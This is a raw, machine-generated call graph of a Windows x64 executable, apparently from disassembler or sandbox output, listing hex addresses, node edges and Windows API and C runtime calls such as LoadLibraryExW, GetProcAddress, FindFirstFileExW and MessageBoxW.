17056->16927 17061 7ff7691acbb5 17060->17061 17062 7ff7691acf53 17060->17062 17064 7ff7691acfb0 17061->17064 17068 7ff7691ad180 17062->17068 17065 7ff7691acfdb 17064->17065 17066 7ff7691acfdf 17065->17066 17067 7ff7691acfbe DeleteCriticalSection 17065->17067 17066->17056 17067->17065 17072 7ff7691acfe8 17068->17072 17078 7ff7691ad0d2 TlsFree 17072->17078 17079 7ff7691ad02c __vcrt_InitializeCriticalSectionEx 17072->17079 17073 7ff7691ad05a LoadLibraryExW 17075 7ff7691ad0f9 17073->17075 17076 7ff7691ad07b GetLastError 17073->17076 17074 7ff7691ad119 GetProcAddress 17074->17078 17075->17074 17077 7ff7691ad110 FreeLibrary 17075->17077 17076->17079 17077->17074 17079->17073 17079->17074 17079->17078 17080 7ff7691ad09d LoadLibraryExW 17079->17080 17080->17075 17080->17079 17084 7ff7691be790 17081->17084 17082 7ff7691be7e3 17083 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17082->17083 17087 7ff7691be80c 17083->17087 17084->17082 17085 7ff7691be836 17084->17085 17376 7ff7691be668 17085->17376 17087->16936 17384 7ff7691abb70 17088->17384 17091 7ff7691a3438 17386 7ff7691a85a0 FindFirstFileExW 17091->17386 17092 7ff7691a341b 17391 7ff7691a29e0 17092->17391 17095 7ff7691a342e 17099 7ff7691ab870 _log10_special 8 API calls 17095->17099 17097 7ff7691a34a5 17410 7ff7691a8760 17097->17410 17098 7ff7691a344b 17401 7ff7691a8620 CreateFileW 17098->17401 17102 7ff7691a34dd 17099->17102 17102->17027 17110 7ff7691a18f0 17102->17110 17104 7ff7691a34b3 17104->17095 17108 7ff7691a26c0 49 API calls 17104->17108 17105 7ff7691a3474 __vcrt_InitializeCriticalSectionEx 17105->17097 17106 7ff7691a345c 17404 7ff7691a26c0 17106->17404 17108->17095 17111 7ff7691a3f70 108 API calls 17110->17111 17112 7ff7691a1925 17111->17112 17113 7ff7691a1bb6 17112->17113 17114 7ff7691a76a0 83 API calls 17112->17114 17115 7ff7691ab870 _log10_special 8 API calls 17113->17115 17117 7ff7691a196b 17114->17117 17116 7ff7691a1bd1 17115->17116 17116->16943 17116->16944 17149 7ff7691a199c 17117->17149 17755 7ff7691af9f4 17117->17755 17119 7ff7691af36c 74 API calls 17119->17113 17120 7ff7691a1985 17121 7ff7691a19a1 17120->17121 17122 7ff7691a1989 17120->17122 17759 7ff7691af6bc 17121->17759 17762 7ff7691a2760 17122->17762 17126 7ff7691a19bf 17128 7ff7691a2760 53 API calls 17126->17128 17127 7ff7691a19d7 17129 7ff7691a1a06 17127->17129 17130 7ff7691a19ee 17127->17130 17128->17149 17132 7ff7691a1bf0 49 API calls 17129->17132 17131 7ff7691a2760 53 API calls 17130->17131 17131->17149 17133 7ff7691a1a1d 17132->17133 17134 7ff7691a1bf0 49 API calls 17133->17134 17135 7ff7691a1a68 17134->17135 17136 7ff7691af9f4 73 API calls 17135->17136 17137 7ff7691a1a8c 17136->17137 17138 7ff7691a1aa1 17137->17138 17139 7ff7691a1ab9 17137->17139 17140 7ff7691a2760 53 API calls 17138->17140 17141 7ff7691af6bc _fread_nolock 53 API calls 17139->17141 17140->17149 17142 7ff7691a1ace 17141->17142 17143 7ff7691a1ad4 17142->17143 17144 7ff7691a1aec 17142->17144 17145 7ff7691a2760 53 API calls 17143->17145 17779 7ff7691af430 17144->17779 17145->17149 17148 7ff7691a25f0 53 API calls 17148->17149 17149->17119 17151 7ff7691a7e1a 17150->17151 17152 7ff7691a86b0 2 API calls 17151->17152 17153 7ff7691a7e39 GetEnvironmentVariableW 17152->17153 17154 7ff7691a7ea2 17153->17154 17155 7ff7691a7e56 ExpandEnvironmentStringsW 17153->17155 17157 7ff7691ab870 _log10_special 8 API calls 17154->17157 17155->17154 17156 7ff7691a7e78 17155->17156 17158 7ff7691a8760 2 API calls 17156->17158 17159 7ff7691a7eb4 17157->17159 17160 7ff7691a7e8a 17158->17160 17159->16952 17161 7ff7691ab870 _log10_special 8 API calls 17160->17161 17162 7ff7691a7e9a 17161->17162 17162->16952 17164 7ff7691a86b0 2 API calls 17163->17164 17165 7ff7691a7f94 17164->17165 17985 7ff7691b7548 17165->17985 17167 7ff7691a7fa6 __std_exception_copy 17167->16970 17169 7ff7691a1c15 17168->17169 17170 7ff7691b3ca4 49 API calls 17169->17170 17171 7ff7691a1c38 17170->17171 17171->16984 17171->16985 17173 7ff7691a8415 17172->17173 18003 7ff7691a7b50 GetCurrentProcess OpenProcessToken 17173->18003 17176 7ff7691a7b50 7 API calls 17177 7ff7691a8441 17176->17177 17178 7ff7691a8474 17177->17178 17179 7ff7691a845a 17177->17179 17181 7ff7691a2590 48 API calls 17178->17181 17180 7ff7691a2590 48 API calls 17179->17180 17182 7ff7691a8472 17180->17182 17183 7ff7691a8487 LocalFree LocalFree 17181->17183 17182->17183 17184 7ff7691a84a3 17183->17184 17186 7ff7691a84af 17183->17186 18013 7ff7691a2940 17184->18013 17187 7ff7691ab870 _log10_special 8 API calls 17186->17187 17188 7ff7691a3814 17187->17188 17224 7ff7691a86d2 MultiByteToWideChar 17223->17224 17225 7ff7691a86f6 17223->17225 17224->17225 17226 7ff7691a870c __std_exception_copy 17224->17226 17225->17226 17227 7ff7691a8713 MultiByteToWideChar 17225->17227 17226->16979 17227->17226 17229 7ff7691a6575 17228->17229 17230 7ff7691a2760 53 API calls 17229->17230 17231 7ff7691a38d5 17229->17231 17230->17231 17232 7ff7691a6b00 17231->17232 17233 7ff7691a6b30 17232->17233 17246 7ff7691a6b4a __std_exception_copy 17232->17246 17233->17246 18188 7ff7691a1440 17233->18188 17235 7ff7691a6b54 17236 7ff7691a3fe0 49 API calls 17235->17236 17235->17246 17237 7ff7691a6b76 17236->17237 17238 7ff7691a6b7b 17237->17238 17239 7ff7691a3fe0 49 API calls 17237->17239 17241 7ff7691a2870 53 API calls 17238->17241 17240 7ff7691a6b9a 17239->17240 17240->17238 17242 7ff7691a3fe0 49 API calls 17240->17242 17241->17246 17243 7ff7691a6bb6 17242->17243 17243->17238 17244 7ff7691a6bbf 17243->17244 17245 7ff7691a25f0 53 API calls 17244->17245 17247 7ff7691a6c2f __std_exception_copy memcpy_s 17244->17247 17245->17246 17246->16995 17247->16995 17257 7ff7691a30ee __scrt_get_show_window_mode 17248->17257 17249 7ff7691a32e7 17250 7ff7691ab870 _log10_special 8 API calls 17249->17250 17251 7ff7691a338e 17250->17251 17251->17027 17267 7ff7691a83e0 LocalFree 17251->17267 17253 7ff7691a1bf0 49 API calls 17253->17257 17254 7ff7691a3309 17256 7ff7691a25f0 53 API calls 17254->17256 17256->17249 17257->17249 17257->17253 17257->17254 17260 7ff7691a32e9 17257->17260 17261 7ff7691a2870 53 API calls 17257->17261 17265 7ff7691a32f7 17257->17265 18249 7ff7691a3f10 17257->18249 18255 7ff7691a7530 17257->18255 18267 7ff7691a15c0 17257->18267 18305 7ff7691a68e0 17257->18305 18309 7ff7691a3b40 17257->18309 18353 7ff7691a3e00 17257->18353 17262 7ff7691a25f0 53 API calls 17260->17262 17261->17257 17262->17249 17266 7ff7691a25f0 53 API calls 17265->17266 17266->17249 17269 7ff7691a262a 17268->17269 17270 7ff7691b3ca4 49 API calls 17269->17270 17271 7ff7691a2652 17270->17271 17272 7ff7691a86b0 2 API calls 17271->17272 17273 7ff7691a266a 17272->17273 17274 7ff7691a2677 MessageBoxW 17273->17274 17275 7ff7691a268e MessageBoxA 17273->17275 17280 7ff7691a3f7c 17279->17280 17281 7ff7691a86b0 2 API calls 17280->17281 17282 7ff7691a3fa4 17281->17282 17283 7ff7691a86b0 2 API calls 17282->17283 17284 7ff7691a3fb7 17283->17284 18473 7ff7691b52a4 17284->18473 17287 7ff7691ab870 _log10_special 8 API calls 17288 7ff7691a3746 17287->17288 17288->16948 17289 7ff7691a76a0 17288->17289 17290 7ff7691a76c4 17289->17290 17291 7ff7691af9f4 73 API calls 17290->17291 17296 7ff7691a779b __std_exception_copy 17290->17296 17292 7ff7691a76e0 17291->17292 17292->17296 18864 7ff7691b6bd8 17292->18864 17294 7ff7691af9f4 73 API calls 17297 7ff7691a76f5 17294->17297 17295 7ff7691af6bc _fread_nolock 53 API calls 17295->17297 17296->16953 17297->17294 17297->17295 17297->17296 17299 7ff7691af39c 17298->17299 18879 7ff7691af148 17299->18879 17301 7ff7691af3b5 17301->16948 17303 7ff7691a1bf0 49 API calls 17302->17303 17304 7ff7691a3ead 17303->17304 17304->16964 17306 7ff7691a1bf0 49 API calls 17305->17306 17307 7ff7691a4010 17306->17307 17307->16984 17326 7ff7691a65bc 17308->17326 17309 7ff7691a66df 17310 7ff7691ab870 _log10_special 8 API calls 17309->17310 17312 7ff7691a66f1 17310->17312 17311 7ff7691a17e0 45 API calls 17311->17326 17312->17002 17313 7ff7691a675d 17315 7ff7691a25f0 53 API calls 17313->17315 17314 7ff7691a1bf0 49 API calls 17314->17326 17315->17309 17316 7ff7691a674a 17317 7ff7691a25f0 53 API calls 17316->17317 17317->17309 17318 7ff7691a3f10 10 API calls 17318->17326 17319 7ff7691a7530 52 API calls 17319->17326 17320 7ff7691a670d 17321 7ff7691a25f0 53 API calls 17320->17321 17321->17309 17322 7ff7691a2870 53 API calls 17322->17326 17323 7ff7691a6737 17324 7ff7691a25f0 53 API calls 17323->17324 17324->17309 17325 7ff7691a15c0 118 API calls 17325->17326 17326->17309 17326->17311 17326->17313 17326->17314 17326->17316 17326->17318 17326->17319 17326->17320 17326->17322 17326->17323 17326->17325 17327 7ff7691a6720 17326->17327 17328 7ff7691a25f0 53 API calls 17327->17328 17328->17309 18890 7ff7691a81a0 17329->18890 17331 7ff7691a6989 17332 7ff7691a81a0 3 API calls 17331->17332 17333 7ff7691a699c 17332->17333 17334 7ff7691a69cf 17333->17334 17335 7ff7691a69b4 17333->17335 17336 7ff7691a25f0 53 API calls 17334->17336 18894 7ff7691a6ea0 GetProcAddress 17335->18894 17338 7ff7691a3916 17336->17338 17338->17011 17339 7ff7691a6cd0 17338->17339 17346 7ff7691a28aa 17345->17346 17347 7ff7691b3ca4 49 API calls 17346->17347 17348 7ff7691a28d2 17347->17348 17349 7ff7691a86b0 2 API calls 17348->17349 17350 7ff7691a28ea 17349->17350 17351 7ff7691a28f7 MessageBoxW 17350->17351 17352 7ff7691a290e MessageBoxA 17350->17352 17353 7ff7691a2920 17351->17353 17352->17353 17354 7ff7691ab870 _log10_special 8 API calls 17353->17354 17355 7ff7691a2930 17354->17355 17356 7ff7691a6780 17355->17356 17357 7ff7691a68d6 17356->17357 17362 7ff7691a6792 17356->17362 17357->16997 18959 7ff7691a5af0 17363->18959 17371 7ff7691a30b9 17372 7ff7691a33a0 17371->17372 17373 7ff7691a33ae 17372->17373 17374 7ff7691a33bf 17373->17374 19232 7ff7691a8180 FreeLibrary 17373->19232 17374->17007 17383 7ff7691b477c EnterCriticalSection 17376->17383 17385 7ff7691a33ec GetModuleFileNameW 17384->17385 17385->17091 17385->17092 17387 7ff7691a85f2 17386->17387 17388 7ff7691a85df FindClose 17386->17388 17389 7ff7691ab870 _log10_special 8 API calls 17387->17389 17388->17387 17390 7ff7691a3442 17389->17390 17390->17097 17390->17098 17392 7ff7691abb70 17391->17392 17393 7ff7691a29fc GetLastError 17392->17393 17394 7ff7691a2a29 17393->17394 17415 7ff7691b3ef8 17394->17415 17399 7ff7691ab870 _log10_special 8 API calls 17400 7ff7691a2ae5 17399->17400 17400->17095 17402 7ff7691a8660 GetFinalPathNameByHandleW CloseHandle 17401->17402 17403 7ff7691a3458 17401->17403 17402->17403 17403->17105 17403->17106 17405 7ff7691a26fa 17404->17405 17406 7ff7691b3ef8 48 API calls 17405->17406 17407 7ff7691a2722 MessageBoxW 17406->17407 17408 7ff7691ab870 _log10_special 8 API calls 17407->17408 17409 7ff7691a274c 17408->17409 17409->17095 17411 7ff7691a878a WideCharToMultiByte 17410->17411 17413 7ff7691a87b5 17410->17413 17411->17413 17414 7ff7691a87cb __std_exception_copy 17411->17414 17412 7ff7691a87d2 WideCharToMultiByte 17412->17414 17413->17412 17413->17414 17414->17104 17416 7ff7691b3f52 17415->17416 17417 7ff7691b3f77 17416->17417 17419 7ff7691b3fb3 17416->17419 17418 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17417->17418 17432 7ff7691b3fa1 17418->17432 17437 7ff7691b22b0 17419->17437 17421 7ff7691b4094 17424 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17421->17424 17423 7ff7691ab870 _log10_special 8 API calls 17425 7ff7691a2a54 FormatMessageW 17423->17425 17424->17432 17433 7ff7691a2590 17425->17433 17426 7ff7691b4069 17429 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17426->17429 17427 7ff7691b40ba 17427->17421 17428 7ff7691b40c4 17427->17428 17431 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17428->17431 17429->17432 17430 7ff7691b4060 17430->17421 17430->17426 17431->17432 17432->17423 17434 7ff7691a25b5 17433->17434 17435 7ff7691b3ef8 48 API calls 17434->17435 17436 7ff7691a25d8 MessageBoxW 17435->17436 17436->17399 17438 7ff7691b22ee 17437->17438 17439 7ff7691b22de 17437->17439 17440 7ff7691b22f7 17438->17440 17445 7ff7691b2325 17438->17445 17441 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17439->17441 17442 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17440->17442 17443 7ff7691b231d 17441->17443 17442->17443 17443->17421 17443->17426 17443->17427 17443->17430 17445->17439 17445->17443 17448 7ff7691b2cc4 17445->17448 17481 7ff7691b2710 17445->17481 17518 7ff7691b1ea0 17445->17518 17449 7ff7691b2d06 17448->17449 17450 7ff7691b2d77 17448->17450 17451 7ff7691b2da1 17449->17451 17452 7ff7691b2d0c 17449->17452 17453 7ff7691b2dd0 17450->17453 17454 7ff7691b2d7c 17450->17454 17541 7ff7691b1074 17451->17541 17455 7ff7691b2d11 17452->17455 17456 7ff7691b2d40 17452->17456 17457 7ff7691b2dda 17453->17457 17458 7ff7691b2de7 17453->17458 17465 7ff7691b2ddf 17453->17465 17461 7ff7691b2db1 17454->17461 17463 7ff7691b2d7e 17454->17463 17455->17458 17460 7ff7691b2d17 17455->17460 17456->17460 17456->17465 17457->17451 17457->17465 17555 7ff7691b39cc 17458->17555 17462 7ff7691b2d20 17460->17462 17469 7ff7691b2d52 17460->17469 17476 7ff7691b2d3b 17460->17476 17548 7ff7691b0c64 17461->17548 17479 7ff7691b2e10 17462->17479 17521 7ff7691b3478 17462->17521 17463->17462 17468 7ff7691b2d8d 17463->17468 17465->17479 17559 7ff7691b1484 17465->17559 17468->17451 17471 7ff7691b2d92 17468->17471 17469->17479 17531 7ff7691b37b4 17469->17531 17471->17479 17537 7ff7691b3878 17471->17537 17473 7ff7691ab870 _log10_special 8 API calls 17475 7ff7691b310a 17473->17475 17475->17445 17476->17479 17480 7ff7691b2ffc 17476->17480 17566 7ff7691b3ae0 17476->17566 17479->17473 17480->17479 17572 7ff7691bdd18 17480->17572 17482 7ff7691b2734 17481->17482 17483 7ff7691b271e 17481->17483 17484 7ff7691b2774 17482->17484 17487 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17482->17487 17483->17484 17485 7ff7691b2d06 17483->17485 17486 7ff7691b2d77 17483->17486 17484->17445 17488 7ff7691b2da1 17485->17488 17489 7ff7691b2d0c 17485->17489 17490 7ff7691b2dd0 17486->17490 17491 7ff7691b2d7c 17486->17491 17487->17484 17498 7ff7691b1074 38 API calls 17488->17498 17492 7ff7691b2d11 17489->17492 17493 7ff7691b2d40 17489->17493 17496 7ff7691b2dda 17490->17496 17497 7ff7691b2de7 17490->17497 17502 7ff7691b2ddf 17490->17502 17494 7ff7691b2db1 17491->17494 17495 7ff7691b2d7e 17491->17495 17492->17497 17499 7ff7691b2d17 17492->17499 17493->17499 17493->17502 17504 7ff7691b0c64 38 API calls 17494->17504 17500 7ff7691b2d20 17495->17500 17507 7ff7691b2d8d 17495->17507 17496->17488 17496->17502 17503 7ff7691b39cc 45 API calls 17497->17503 17513 7ff7691b2d3b 17498->17513 17499->17500 17505 7ff7691b2d52 17499->17505 17499->17513 17501 7ff7691b3478 47 API calls 17500->17501 17516 7ff7691b2e10 17500->17516 17501->17513 17506 7ff7691b1484 38 API calls 17502->17506 17502->17516 17503->17513 17504->17513 17508 7ff7691b37b4 46 API calls 17505->17508 17505->17516 17506->17513 17507->17488 17509 7ff7691b2d92 17507->17509 17508->17513 17511 7ff7691b3878 37 API calls 17509->17511 17509->17516 17510 7ff7691ab870 _log10_special 8 API calls 17512 7ff7691b310a 17510->17512 17511->17513 17512->17445 17514 7ff7691b3ae0 45 API calls 17513->17514 17513->17516 17517 7ff7691b2ffc 17513->17517 17514->17517 17515 7ff7691bdd18 46 API calls 17515->17517 17516->17510 17517->17515 17517->17516 17738 7ff7691b02e8 17518->17738 17522 7ff7691b349e 17521->17522 17584 7ff7691afea0 17522->17584 17527 7ff7691b35e3 17529 7ff7691b3ae0 45 API calls 17527->17529 17530 7ff7691b3671 17527->17530 17528 7ff7691b3ae0 45 API calls 17528->17527 17529->17530 17530->17476 17532 7ff7691b37e9 17531->17532 17533 7ff7691b3807 17532->17533 17534 7ff7691b3ae0 45 API calls 17532->17534 17536 7ff7691b382e 17532->17536 17535 7ff7691bdd18 46 API calls 17533->17535 17534->17533 17535->17536 17536->17476 17539 7ff7691b3899 17537->17539 17538 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17540 7ff7691b38ca 17538->17540 17539->17538 17539->17540 17540->17476 17542 7ff7691b10a7 17541->17542 17543 7ff7691b10d6 17542->17543 17545 7ff7691b1193 17542->17545 17547 7ff7691b1113 17543->17547 17711 7ff7691aff48 17543->17711 17546 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17545->17546 17546->17547 17547->17476 17549 7ff7691b0c97 17548->17549 17550 7ff7691b0cc6 17549->17550 17552 7ff7691b0d83 17549->17552 17551 7ff7691aff48 12 API calls 17550->17551 17554 7ff7691b0d03 17550->17554 17551->17554 17553 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17552->17553 17553->17554 17554->17476 17556 7ff7691b3a0f 17555->17556 17558 7ff7691b3a13 __crtLCMapStringW 17556->17558 17719 7ff7691b3a68 17556->17719 17558->17476 17560 7ff7691b14b7 17559->17560 17561 7ff7691b14e6 17560->17561 17563 7ff7691b15a3 17560->17563 17562 7ff7691aff48 12 API calls 17561->17562 17565 7ff7691b1523 17561->17565 17562->17565 17564 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17563->17564 17564->17565 17565->17476 17567 7ff7691b3af7 17566->17567 17723 7ff7691bccc8 17567->17723 17573 7ff7691bdd57 17572->17573 17574 7ff7691bdd49 17572->17574 17573->17480 17574->17573 17575 7ff7691bdd77 17574->17575 17576 7ff7691b3ae0 45 API calls 17574->17576 17577 7ff7691bddaf 17575->17577 17578 7ff7691bdd88 17575->17578 17576->17575 17577->17573 17580 7ff7691bde3a 17577->17580 17581 7ff7691bddd9 17577->17581 17731 7ff7691bf3b0 17578->17731 17582 7ff7691bebb0 _fread_nolock MultiByteToWideChar 17580->17582 17581->17573 17583 7ff7691bebb0 _fread_nolock MultiByteToWideChar 17581->17583 17582->17573 17583->17573 17585 7ff7691afed7 17584->17585 17591 7ff7691afec6 17584->17591 17586 7ff7691bc90c _fread_nolock 12 API calls 17585->17586 17585->17591 17588 7ff7691aff04 17586->17588 17587 7ff7691aff18 17589 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17587->17589 17588->17587 17590 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17588->17590 17589->17591 17590->17587 17592 7ff7691bd880 17591->17592 17593 7ff7691bd8d0 17592->17593 17594 7ff7691bd89d 17592->17594 17593->17594 17596 7ff7691bd902 17593->17596 17595 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17594->17595 17611 7ff7691b35c1 17595->17611 17600 7ff7691bda15 17596->17600 17605 7ff7691bd94a 17596->17605 17597 7ff7691bdb07 17638 7ff7691bcd6c 17597->17638 17599 7ff7691bdacd 17631 7ff7691bd104 17599->17631 17600->17597 17600->17599 17601 7ff7691bda9c 17600->17601 17603 7ff7691bda5f 17600->17603 17606 7ff7691bda55 17600->17606 17624 7ff7691bd3e4 17601->17624 17614 7ff7691bd614 17603->17614 17609 7ff7691b97b4 __std_exception_copy 37 API calls 17605->17609 17605->17611 17606->17599 17608 7ff7691bda5a 17606->17608 17608->17601 17608->17603 17610 7ff7691bda02 17609->17610 17610->17611 17612 7ff7691b9c10 _isindst 17 API calls 17610->17612 17611->17527 17611->17528 17613 7ff7691bdb64 17612->17613 17647 7ff7691c33bc 17614->17647 17618 7ff7691bd6bc 17619 7ff7691bd6c0 17618->17619 17620 7ff7691bd711 17618->17620 17621 7ff7691bd6dc 17618->17621 17619->17611 17700 7ff7691bd200 17620->17700 17696 7ff7691bd4bc 17621->17696 17625 7ff7691c33bc 38 API calls 17624->17625 17626 7ff7691bd42e 17625->17626 17627 7ff7691c2e04 37 API calls 17626->17627 17628 7ff7691bd47e 17627->17628 17629 7ff7691bd482 17628->17629 17630 7ff7691bd4bc 45 API calls 17628->17630 17629->17611 17630->17629 17632 7ff7691c33bc 38 API calls 17631->17632 17633 7ff7691bd14f 17632->17633 17634 7ff7691c2e04 37 API calls 17633->17634 17635 7ff7691bd1a7 17634->17635 17636 7ff7691bd1ab 17635->17636 17637 7ff7691bd200 45 API calls 17635->17637 17636->17611 17637->17636 17639 7ff7691bcdb1 17638->17639 17640 7ff7691bcde4 17638->17640 17642 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17639->17642 17641 7ff7691bcdfc 17640->17641 17644 7ff7691bce7d 17640->17644 17643 7ff7691bd104 46 API calls 17641->17643 17646 7ff7691bcddd __scrt_get_show_window_mode 17642->17646 17643->17646 17645 7ff7691b3ae0 45 API calls 17644->17645 17644->17646 17645->17646 17646->17611 17648 7ff7691c340f fegetenv 17647->17648 17649 7ff7691c713c 37 API calls 17648->17649 17654 7ff7691c3462 17649->17654 17650 7ff7691c348f 17653 7ff7691b97b4 __std_exception_copy 37 API calls 17650->17653 17651 7ff7691c3552 17652 7ff7691c713c 37 API calls 17651->17652 17655 7ff7691c357c 17652->17655 17656 7ff7691c350d 17653->17656 17654->17651 17657 7ff7691c347d 17654->17657 17658 7ff7691c352c 17654->17658 17659 7ff7691c713c 37 API calls 17655->17659 17660 7ff7691c4634 17656->17660 17666 7ff7691c3515 17656->17666 17657->17650 17657->17651 17661 7ff7691b97b4 __std_exception_copy 37 API calls 17658->17661 17662 7ff7691c358d 17659->17662 17663 7ff7691b9c10 _isindst 17 API calls 17660->17663 17661->17656 17664 7ff7691c7330 20 API calls 17662->17664 17665 7ff7691c4649 17663->17665 17674 7ff7691c35f6 __scrt_get_show_window_mode 17664->17674 17667 7ff7691ab870 _log10_special 8 API calls 17666->17667 17668 7ff7691bd661 17667->17668 17692 7ff7691c2e04 17668->17692 17669 7ff7691c399f __scrt_get_show_window_mode 17670 7ff7691c3cdf 17671 7ff7691c2f20 37 API calls 17670->17671 17678 7ff7691c43f7 17671->17678 17672 7ff7691c3c8b 17672->17670 17675 7ff7691c464c memcpy_s 37 API calls 17672->17675 17673 7ff7691c3637 memcpy_s 17686 7ff7691c3f7b memcpy_s __scrt_get_show_window_mode 17673->17686 17690 7ff7691c3a93 memcpy_s __scrt_get_show_window_mode 17673->17690 17674->17669 17674->17673 17676 7ff7691b43f4 _set_fmode 11 API calls 17674->17676 17675->17670 17677 7ff7691c3a70 17676->17677 17679 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17677->17679 17680 7ff7691c464c memcpy_s 37 API calls 17678->17680 17685 7ff7691c4452 17678->17685 17679->17673 17680->17685 17681 7ff7691c45d8 17683 7ff7691c713c 37 API calls 17681->17683 17682 7ff7691b43f4 11 API calls _set_fmode 17682->17690 17683->17666 17684 7ff7691b43f4 11 API calls _set_fmode 17684->17686 17685->17681 17687 7ff7691c2f20 37 API calls 17685->17687 17691 7ff7691c464c memcpy_s 37 API calls 17685->17691 17686->17670 17686->17672 17686->17684 17688 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 17686->17688 17687->17685 17688->17686 17689 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 17689->17690 17690->17672 17690->17682 17690->17689 17691->17685 17693 7ff7691c2e23 17692->17693 17694 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17693->17694 17695 7ff7691c2e4e memcpy_s 17693->17695 17694->17695 17695->17618 17697 7ff7691bd4e8 memcpy_s 17696->17697 17698 7ff7691b3ae0 45 API calls 17697->17698 17699 7ff7691bd5a2 memcpy_s __scrt_get_show_window_mode 17697->17699 17698->17699 17699->17619 17701 7ff7691bd23b 17700->17701 17707 7ff7691bd288 memcpy_s 17700->17707 17702 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17701->17702 17703 7ff7691bd267 17702->17703 17703->17619 17704 7ff7691bd2f3 17705 7ff7691b97b4 __std_exception_copy 37 API calls 17704->17705 17710 7ff7691bd335 memcpy_s 17705->17710 17706 7ff7691b3ae0 45 API calls 17706->17704 17707->17704 17707->17706 17708 7ff7691b9c10 _isindst 17 API calls 17709 7ff7691bd3e0 17708->17709 17710->17708 17712 7ff7691aff7f 17711->17712 17713 7ff7691aff6e 17711->17713 17712->17713 17714 7ff7691bc90c _fread_nolock 12 API calls 17712->17714 17713->17547 17715 7ff7691affb0 17714->17715 17716 7ff7691affc4 17715->17716 17717 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17715->17717 17718 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17716->17718 17717->17716 17718->17713 17720 7ff7691b3a86 17719->17720 17721 7ff7691b3a8e 17719->17721 17722 7ff7691b3ae0 45 API calls 17720->17722 17721->17558 17722->17721 17724 7ff7691b3b1f 17723->17724 17725 7ff7691bcce1 17723->17725 17727 7ff7691bcd34 17724->17727 17725->17724 17726 7ff7691c2614 45 API calls 17725->17726 17726->17724 17728 7ff7691b3b2f 17727->17728 17729 7ff7691bcd4d 17727->17729 17728->17480 17729->17728 17730 7ff7691c1960 45 API calls 17729->17730 17730->17728 17734 7ff7691c6098 17731->17734 17737 7ff7691c60fc 17734->17737 17735 7ff7691ab870 _log10_special 8 API calls 17736 7ff7691bf3cd 17735->17736 17736->17573 17737->17735 17739 7ff7691b032f 17738->17739 17740 7ff7691b031d 17738->17740 17743 7ff7691b033d 17739->17743 17747 7ff7691b0379 17739->17747 17741 7ff7691b43f4 _set_fmode 11 API calls 17740->17741 17742 7ff7691b0322 17741->17742 17744 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17742->17744 17745 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17743->17745 17752 7ff7691b032d 17744->17752 17745->17752 17746 7ff7691b06f5 17748 7ff7691b43f4 _set_fmode 11 API calls 17746->17748 17746->17752 17747->17746 17749 7ff7691b43f4 _set_fmode 11 API calls 17747->17749 17750 7ff7691b0989 17748->17750 17751 7ff7691b06ea 17749->17751 17753 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17750->17753 17754 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17751->17754 17752->17445 17753->17752 17754->17746 17756 7ff7691afa24 17755->17756 17785 7ff7691af784 17756->17785 17758 7ff7691afa3d 17758->17120 17797 7ff7691af6dc 17759->17797 17763 7ff7691a277c 17762->17763 17764 7ff7691b43f4 _set_fmode 11 API calls 17763->17764 17765 7ff7691a2799 17764->17765 17811 7ff7691b3ca4 17765->17811 17770 7ff7691a1bf0 49 API calls 17771 7ff7691a2807 17770->17771 17772 7ff7691a86b0 2 API calls 17771->17772 17773 7ff7691a281f 17772->17773 17774 7ff7691a2843 MessageBoxA 17773->17774 17775 7ff7691a282c MessageBoxW 17773->17775 17776 7ff7691a2855 17774->17776 17775->17776 17777 7ff7691ab870 _log10_special 8 API calls 17776->17777 17778 7ff7691a2865 17777->17778 17778->17149 17780 7ff7691af439 17779->17780 17782 7ff7691a1b06 17779->17782 17781 7ff7691b43f4 _set_fmode 11 API calls 17780->17781 17783 7ff7691af43e 17781->17783 17782->17148 17782->17149 17784 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17783->17784 17784->17782 17786 7ff7691af7ee 17785->17786 17787 7ff7691af7ae 17785->17787 17786->17787 17789 7ff7691af7fa 17786->17789 17788 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17787->17788 17795 7ff7691af7d5 17788->17795 17796 7ff7691b477c EnterCriticalSection 17789->17796 17795->17758 17798 7ff7691a19b9 17797->17798 17799 7ff7691af706 17797->17799 17798->17126 17798->17127 17799->17798 17800 7ff7691af752 17799->17800 17801 7ff7691af715 __scrt_get_show_window_mode 17799->17801 17810 7ff7691b477c EnterCriticalSection 17800->17810 17803 7ff7691b43f4 _set_fmode 11 API calls 17801->17803 17805 7ff7691af72a 17803->17805 17807 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17805->17807 17807->17798 17815 7ff7691b3cfe 17811->17815 17812 7ff7691b3d23 17813 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17812->17813 17818 7ff7691b3d4d 17813->17818 17814 7ff7691b3d5f 17841 7ff7691b1f30 17814->17841 17815->17812 17815->17814 17817 7ff7691b3e3c 17820 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17817->17820 17819 7ff7691ab870 _log10_special 8 API calls 17818->17819 17822 7ff7691a27d8 17819->17822 